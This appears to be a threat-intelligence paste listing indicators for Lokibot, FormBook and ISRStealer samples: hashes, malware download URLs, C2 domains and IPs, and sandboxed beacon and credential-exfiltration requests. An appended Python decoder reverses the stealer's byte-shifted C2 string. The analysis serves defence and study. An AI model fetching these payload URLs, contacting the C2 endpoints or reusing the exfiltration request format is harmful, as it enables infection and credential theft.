Untitled

a guest
May 8th, 2018
#Lokibot
The C2 is dead; manual analysis reveals where it was located.
"New order.exe"
sha256 4d6b690c476dbe7929d0e9c630df8374186b1b9e357f50f04494db556fb857d8
sha1 69c8bb61eac811e0c667b520c081096a19959930
md5 0b09f5e0ad21b4e80cf4bebd33cb6412
Dropped executable file
C:\Users\admin\AppData\Roaming\F63AAA\A71D80.exe
sha256 6df94b7fa33f1b87142adc39b3db0613fc520d9e7a5fd6a5301dd7f51f8d0386
DNS requests
domain oja34user[.]com

Unpacked: https://www.virustotal.com/#/file/342fa89846da6d06dae7668127dfbf4f89ff92112cd2391fec5fb15171ad566a/details

strings:
MAC=%02X%02X%02XINSTALL=%08X%08Xk
http://oja34user.com/emma/Panel/five/fre.php


#FormBook #ISRstealer

#formbook
"1p.exe"
url http://sealtravel.co.ke/chrome/1p.exe
sha256 85c093096a6fd8e8a5d9578a3251421d0defb94edade3e8aa75351a6a92ce33f
sha1 488a1ec122268fcce26a7a39244611f76ce327c8
md5 ef46006dec50bb2a265617e9c3054220
DNS requests
domain www.doctors-inc.net
domain www.teralabo.com
domain www.lxztrrwzx67-pdliebbcnx.tech
domain www.administrator-on-call.com
domain www.lc9665.com
Connections
ip 117.169.84.232
ip 72.52.4.122
ip 172.217.22.115
HTTP/HTTPS requests
url http://www.administrator-on-call.com/lo/?qr-=XY4vAE5JWOHo6cpyHYpWhbyZIrQ4h8LHqVczto7ni7rQwQKP1xl9p4sdEVcaR4wwwU+plA==&qNG=DXRDwDUh8FMTY
url http://www.lc9665.com/lo/
url http://www.lc9665.com/lo/?qr-=VQDxoS2ACcuYGErQ2Q+JGjzA2udBux6R+4EVqnfb/s6g3lTabJbkcQN8F+Q15js0zjxHFw==&qNG=DXRDwDUh8FMTY&sql=1
url http://www.doctors-inc.net/lo/?qr-=LGvBXu2gCtUdgWsP+AUC6SZsApAxInbCgICDbjtK16opxMymUDfvgrT8z+HHXWWGt8v7hA==&qNG=DXRDwDUh8FMTY&sql=1
url http://www.doctors-inc.net/lo/

"3p.exe"
url http://sealtravel.co.ke/chrome/3p.exe
sha256 55a57cbd97abb3ea89e14fc42732c0396d508835460a27e150580d1b30b7c733
sha1 ccaffa6e6b9c23f9cc7637db1b5392dfcd7f3d0c
md5 416718cbe4198ac882b77b1eac504196
DNS requests
domain www.citadelip.com
domain www.kloramde.com
Connections
ip 192.185.28.193
ip 198.187.30.201
HTTP/HTTPS requests
url http://www.kloramde.com/lo/?EZQltXS=oPgwoGDpGMvVAiAvBZzSDKnFD14HxnmgmreuF77oWdRODJQePVuUG50y5dv1TAmkvj+FXQ==&DzyLb=VD8LEnU8_TnxKj
url http://www.citadelip.com/lo/?EZQltXS=gKqTGck4BNLgYiaQ8+7gGlkIF/JLnCJfWxY/ZRmUg5Hq0cuP+3ZdvNIqJj7tDCek97QcOQ==&DzyLb=VD8LEnU8_TnxKj&sql=1
url http://www.citadelip.com/lo/


"5x.exe"
url http://sealtravel.co.ke/chrome/5x.exe
sha256 3b03539fc2341a619ce138b2c4977ec9054df52ac7cfdf329cd0e23ae7c0b352
sha1 94f95cac28919f034067a21ff99f30b2710af34f
md5 3c1633f386bfd6e29f3cfd9114fbe092
DNS requests
domain www.bestdehumidifierguide.com
domain www.wizaallianz.com
domain www.importanceeducated.com
domain www.royaltyfreesubscriptions.com
Connections
ip 54.187.202.68
ip 192.64.119.254
ip 202.71.109.31
ip 104.18.58.184
HTTP/HTTPS requests
url http://www.importanceeducated.com/xa/?Tx4hBt2=LdCX8+p2HXAi9LTIDwQ5MxBTgvdxPDUSuhG/gW+lIGgfEJUoQ6/C3ki3ac30BLTbvkpHgg==&6l=mnBXn
url http://www.royaltyfreesubscriptions.com/xa/?Tx4hBt2=wn/Im6F2gEOoii2gObMST19ozpj2GJKPzODymswawf3y+Bo8pwFEinUwcW6OTQzImi6ofA==&6l=mnBXn&sql=1
url http://www.wizaallianz.com/xa/
url http://www.wizaallianz.com/xa/?Tx4hBt2=Izxx4HqOK6KUQq69aMgqM6mZIfb9U68v16yvcd4wE0Z4eObS2L+2lkstSPc/ZLQXGrJYmA==&6l=mnBXn&sql=1
url http://www.bestdehumidifierguide.com/xa/
url http://www.bestdehumidifierguide.com/xa/?Tx4hBt2=KG1Rc65MqDobK7srlTteBckNFi9wyvO2p4R3XZo0ThSMryCPF3wx9B1k4Qajoy9KYXiCyA==&6l=mnBXn&sql=1
  84.  
#ISRStealer
"3a.exe"
url http://sealtravel.co.ke/chrome/3a.exe
sha256 7dfab1e26e2c172a4c76e710cf7e74cd676b4206e163c19de2ac1b7650637ee3
sha1 95fe82f6955d80f887b3f222696c40edc8dce3bf
md5 afe903482330df4f425a7e48a464821f
DNS requests
domain blacktravertine.com
Connections
ip 85.95.234.101
HTTP/HTTPS requests
url http://blacktravertine.com/wordpress/wp-includes/images/media/windows/chrome/index.php?action=add&username=&password=&app=&pcname=PC&sitename=

Unpacked: https://www.virustotal.com/#/file/6b138751318b0ab6815cde0fec060d9019e9e06751589107e10b7ec903d6f358/detection

strings:
EsISQ6XGhVsi6FyhW3iO3rIwoibWly
HardCore Software For : Public
?action=add&username=
frrn8--`j_airp_tcprglc,amk-umpbnpcqq-un+glajsbcq-gk_ecq-kcbg_-uglbmuq-afpmkc-glbcv,nfn
Mail Password Recovery
Mail PassView
mailpv
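The odd-looking string frrn8--`j_airp_tcprglc,amk-... in the unpacked ISRStealer binary is the C2 URL with every byte shifted down by two (f+2=h, r+2=t, 8+2=:, -+2=/), and the ?action=add&username= string right above it is the query suffix. The paste does not state this; the shift is my own observation, verified against the URL in the HTTP request logged above. The following is an added example, not code from the paste: it recovers the shift from the known http:// prefix rather than assuming it, decodes the string, and checks the result against the observed request.

```python
import string

# Obfuscated string from the unpacked ISRStealer sample, copied from the paste.
OBFUSCATED = "frrn8--`j_airp_tcprglc,amk-umpbnpcqq-un+glajsbcq-gk_ecq-kcbg_-uglbmuq-afpmkc-glbcv,nfn"
# URL from the sandboxed HTTP request above, with and without its query string.
OBSERVED_REQUEST = ("http://blacktravertine.com/wordpress/wp-includes/images/media/"
                    "windows/chrome/index.php?action=add&username=&password=&app="
                    "&pcname=PC&sitename=")
OBSERVED = OBSERVED_REQUEST.split("?", 1)[0]


def shift_decode(data, delta):
    """Add `delta` to every byte; the inverse of a subtract-`delta` obfuscation."""
    return "".join(chr((ord(c) + delta) & 0xFF) for c in data)


def recover_shift(data, known_prefix="http://"):
    """Return the single byte shift that maps the start of `data` onto
    `known_prefix`, or None if no one shift explains every prefix byte."""
    if len(data) < len(known_prefix):
        return None
    deltas = {(ord(p) - ord(c)) & 0xFF for c, p in zip(data, known_prefix)}
    return deltas.pop() if len(deltas) == 1 else None


def decode_c2(data=OBFUSCATED):
    """Recover the shift from the http:// prefix, decode the whole string and
    reject results that are not printable (a wrong shift yields garbage)."""
    delta = recover_shift(data)
    if delta is None:
        return None
    plain = shift_decode(data, delta)
    if not all(ch in string.printable for ch in plain):
        return None
    return plain


def matches_observed_request(data=OBFUSCATED, suffix="?action=add&username="):
    """True if the decoded C2 plus the query suffix string seen in the binary
    is a prefix of the request the sandbox actually recorded."""
    plain = decode_c2(data)
    return plain is not None and OBSERVED_REQUEST.startswith(plain + suffix)


if __name__ == "__main__":
    print("shift:", recover_shift(OBFUSCATED))
    print("decoded:", decode_c2())
    print("matches sandbox request:", matches_observed_request())
```

Recovering the shift from a known plaintext prefix is the part worth keeping: the same function works on any stealer that stores its URLs under a single-byte add/subtract, as long as you know (or can guess) a few leading plaintext bytes.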